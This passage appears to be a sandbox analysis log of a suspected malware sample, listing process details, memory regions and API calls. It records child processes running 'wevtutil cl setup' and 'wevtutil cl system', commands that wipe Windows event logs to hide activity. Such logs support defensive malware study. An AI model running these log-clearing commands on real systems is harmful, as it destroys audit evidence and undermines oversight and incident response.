"c:\\windows\\system32\\conhost.exe" page_root = "0x34009000" os_pid = "0x4d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xb58" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 489 start_va = 0x7f73a000 end_va = 0x7f73afff entry_point = 0x0 region_type = private name = "private_0x000000007f73a000" filename = "" Region: id = 490 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 491 start_va = 0xb385e80000 end_va = 0xb385e9ffff entry_point = 0x0 region_type = private name = "private_0x000000b385e80000" filename = "" Region: id = 492 start_va = 0xb385ea0000 end_va = 0xb385eb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b385ea0000" filename = "" Region: id = 493 start_va = 0xb385ec0000 end_va = 0xb385efffff entry_point = 0x0 region_type = private name = "private_0x000000b385ec0000" filename = "" Region: id = 494 start_va = 0x7df600000000 end_va = 0x7ff5ffffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df600000000" filename = "" Region: id = 495 start_va = 0x7ff6c42e0000 end_va = 0x7ff6c4302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c42e0000" filename = "" Region: id = 496 start_va = 0x7ff6c430d000 end_va = 0x7ff6c430efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c430d000" filename = "" Region: id = 497 start_va = 0x7ff6c430f000 end_va = 0x7ff6c430ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c430f000" filename = "" Region: id = 498 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 499 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 500 start_va = 0xb385f30000 end_va = 0xb38602ffff entry_point = 0x0 region_type = private name = "private_0x000000b385f30000" filename = "" Region: id = 501 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 502 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 503 start_va = 0xb385e80000 end_va = 0xb385e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b385e80000" filename = "" Region: id = 504 start_va = 0xb385e90000 end_va = 0xb385e96fff entry_point = 0x0 region_type = private name = "private_0x000000b385e90000" filename = "" Region: id = 505 start_va = 0xb385f00000 end_va = 0xb385f00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b385f00000" filename = "" Region: id = 506 start_va = 0xb385f10000 end_va = 0xb385f16fff entry_point = 0x0 region_type = private name = "private_0x000000b385f10000" filename = "" Region: id = 507 start_va = 0xb385f20000 end_va = 0xb385f20fff entry_point = 0x0 region_type = private name = "private_0x000000b385f20000" filename = "" Region: id = 508 start_va = 0xb386030000 end_va = 0xb3860edfff entry_point = 0xb386030000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 509 start_va = 0xb3860f0000 end_va = 0xb38612ffff entry_point = 0x0 region_type = private name = "private_0x000000b3860f0000" filename = "" Region: id = 510 start_va = 0xb386130000 end_va = 0xb386130fff entry_point = 0x0 region_type = private name = "private_0x000000b386130000" filename = "" Region: id = 511 start_va = 0xb3861e0000 end_va = 0xb3861effff entry_point = 0x0 region_type = private name = "private_0x000000b3861e0000" filename = "" Region: id = 512 start_va = 0xb3861f0000 end_va = 0xb386377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b3861f0000" filename = "" Region: id = 513 start_va = 0xb386380000 end_va = 0xb386500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b386380000" filename = "" Region: id = 514 start_va = 0xb386510000 end_va = 0xb38790ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b386510000" filename = "" Region: id = 515 start_va = 0x7ff6c41e0000 end_va = 0x7ff6c42dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c41e0000" filename = "" Region: id = 516 start_va = 0x7ff6c430b000 end_va = 0x7ff6c430cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c430b000" filename = "" Region: id = 517 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 518 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 519 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 520 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 521 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 522 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 523 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 524 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 525 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 526 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 527 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 528 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 20 os_tid = 0xbc0 Thread: id = 21 os_tid = 0x788 Thread: id = 22 os_tid = 0x594 Process: id = "10" image_name = "wevtutil.exe" filename = "c:\\windows\\syswow64\\wevtutil.exe" page_root = "0x78b46000" os_pid = "0x9ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xb58" cmd_line = "wevtutil cl setup" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 542 start_va = 0x5c0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 543 start_va = 0x5e0000 end_va = 0x5e1fff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 544 start_va = 0x5f0000 end_va = 0x603fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 545 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 546 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 547 start_va = 0x690000 end_va = 0x693fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 548 start_va = 0x6a0000 end_va = 0x6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 549 start_va = 0x6b0000 end_va = 0x6b1fff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 550 start_va = 0xac0000 end_va = 0xaeefff entry_point = 0xac0000 region_type = mapped_file name = "wevtutil.exe" filename = "\\Windows\\SysWOW64\\wevtutil.exe" (normalized: "c:\\windows\\syswow64\\wevtutil.exe") Region: id = 551 start_va = 0xaf0000 end_va = 0x4aeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 552 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 553 start_va = 0x7fa70000 end_va = 0x7fa92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fa70000" filename = "" Region: id = 554 start_va = 0x7fa98000 end_va = 0x7fa9afff entry_point = 0x0 region_type = private name = "private_0x000000007fa98000" filename = "" Region: id = 555 start_va = 0x7fa9b000 end_va = 0x7fa9bfff entry_point = 0x0 region_type = private name = "private_0x000000007fa9b000" filename = "" Region: id = 556 start_va = 0x7fa9e000 end_va = 0x7fa9efff entry_point = 0x0 region_type = private name = "private_0x000000007fa9e000" filename = "" Region: id = 557 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 558 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 559 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 560 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 561 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 562 start_va = 0x880000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 563 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 564 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 565 start_va = 0x6c0000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 566 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 24 os_tid = 0xf0 Thread: id = 25 os_tid = 0x8bc Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x58c4e000" os_pid = "0xb2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c wevtutil cl system" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 567 start_va = 0x140000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 568 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 569 start_va = 0x170000 end_va = 0x183fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 570 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 571 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 572 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 573 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 574 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 575 start_va = 0x7f260000 end_va = 0x7f282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f260000" filename = "" Region: id = 576 start_va = 0x7f284000 end_va = 0x7f284fff entry_point = 0x0 region_type = private name = "private_0x000000007f284000" filename = "" Region: id = 577 start_va = 0x7f285000 end_va = 0x7f285fff entry_point = 0x0 region_type = private name = "private_0x000000007f285000" filename = "" Region: id = 578 start_va = 0x7f28d000 end_va = 0x7f28ffff entry_point = 0x0 region_type = private name = "private_0x000000007f28d000" filename = "" Region: id = 579 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 580 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 581 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 582 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 583 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 584 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 585 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 586 start_va = 0x2f0000 end_va = 0x2f1fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 587 start_va = 0x44d0000 end_va = 0x44dffff entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 588 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 589 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 590 start_va = 0x4550000 end_va = 0x464ffff entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 591 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 632 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 633 start_va = 0x300000 end_va = 0x3bdfff entry_point = 0x300000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 634 start_va = 0x4410000 end_va = 0x444ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 635 start_va = 0x44b0000 end_va = 0x44bffff entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 636 start_va = 0x4650000 end_va = 0x474ffff entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 637 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 638 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 639 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 640 start_va = 0x7f160000 end_va = 0x7f25ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f160000" filename = "" Region: id = 641 start_va = 0x7f28a000 end_va = 0x7f28cfff entry_point = 0x0 region_type = private name = "private_0x000000007f28a000" filename = "" Region: id = 642 start_va = 0x150000 end_va = 0x153fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 643 start_va = 0x160000 end_va = 0x163fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 644 start_va = 0x4750000 end_va = 0x4a86fff entry_point = 0x4750000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 26 os_tid = 0x6c8 [0095.246] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0095.246] __set_app_type (_Type=0x1) [0095.246] __p__fmode () returned 0x77ac4d6c [0095.246] __p__commode () returned 0x77ac5b1c [0095.246] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0095.246] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0095.246] GetCurrentThreadId () returned 0x6c8 [0095.246] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6c8) returned 0x84 [0095.247] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0095.247] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0095.247] SetThreadUILanguage (LangId=0x0) returned 0x409 [0095.249] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0095.249] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf724 | out: phkResult=0x2cf724*=0x0) returned 0x2 [0095.249] VirtualQuery (in: lpAddress=0x2cf72b, lpBuffer=0x2cf6dc, dwLength=0x1c | out: lpBuffer=0x2cf6dc*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0095.249] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf6dc, dwLength=0x1c | out: lpBuffer=0x2cf6dc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0095.249] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf6dc, dwLength=0x1c | out: lpBuffer=0x2cf6dc*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0095.249] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf6dc, dwLength=0x1c | out: lpBuffer=0x2cf6dc*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0095.250] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf6dc, dwLength=0x1c | out: lpBuffer=0x2cf6dc*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0095.250] GetConsoleOutputCP () returned 0x1b5 [0095.250] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0095.250] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0095.250] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.250] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0095.250] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.250] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0095.250] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.250] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0095.251] _get_osfhandle (_FileHandle=0) returned 0x38 [0095.251] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0095.251] _get_osfhandle (_FileHandle=0) returned 0x38 [0095.251] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0095.251] GetEnvironmentStringsW () returned 0x4557d50* [0095.251] FreeEnvironmentStringsA (penv="A") returned 1 [0095.251] GetEnvironmentStringsW () returned 0x4557d50* [0095.251] FreeEnvironmentStringsA (penv="A") returned 1 [0095.251] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce688 | out: phkResult=0x2ce688*=0x94) returned 0x0 [0095.251] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x0, lpData=0x2ce694*=0xe2, lpcbData=0x2ce690*=0x1000) returned 0x2 [0095.251] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x4, lpData=0x2ce694*=0x1, lpcbData=0x2ce690*=0x4) returned 0x0 [0095.251] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x0, lpData=0x2ce694*=0x1, lpcbData=0x2ce690*=0x1000) returned 0x2 [0095.251] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x4, lpData=0x2ce694*=0x0, lpcbData=0x2ce690*=0x4) returned 0x0 [0095.251] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x4, lpData=0x2ce694*=0x40, lpcbData=0x2ce690*=0x4) returned 0x0 [0095.252] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x4, lpData=0x2ce694*=0x40, lpcbData=0x2ce690*=0x4) returned 0x0 [0095.252] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x0, lpData=0x2ce694*=0x40, lpcbData=0x2ce690*=0x1000) returned 0x2 [0095.252] RegCloseKey (hKey=0x94) returned 0x0 [0095.252] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce688 | out: phkResult=0x2ce688*=0x94) returned 0x0 [0095.252] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x0, lpData=0x2ce694*=0x40, lpcbData=0x2ce690*=0x1000) returned 0x2 [0095.252] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x4, lpData=0x2ce694*=0x1, lpcbData=0x2ce690*=0x4) returned 0x0 [0095.252] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x0, lpData=0x2ce694*=0x1, lpcbData=0x2ce690*=0x1000) returned 0x2 [0095.252] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x4, lpData=0x2ce694*=0x0, lpcbData=0x2ce690*=0x4) returned 0x0 [0095.252] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x4, lpData=0x2ce694*=0x9, lpcbData=0x2ce690*=0x4) returned 0x0 [0095.252] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce68c, lpData=0x2ce694, lpcbData=0x2ce690*=0x1000 | out: lpType=0x2ce68c*=0x4, 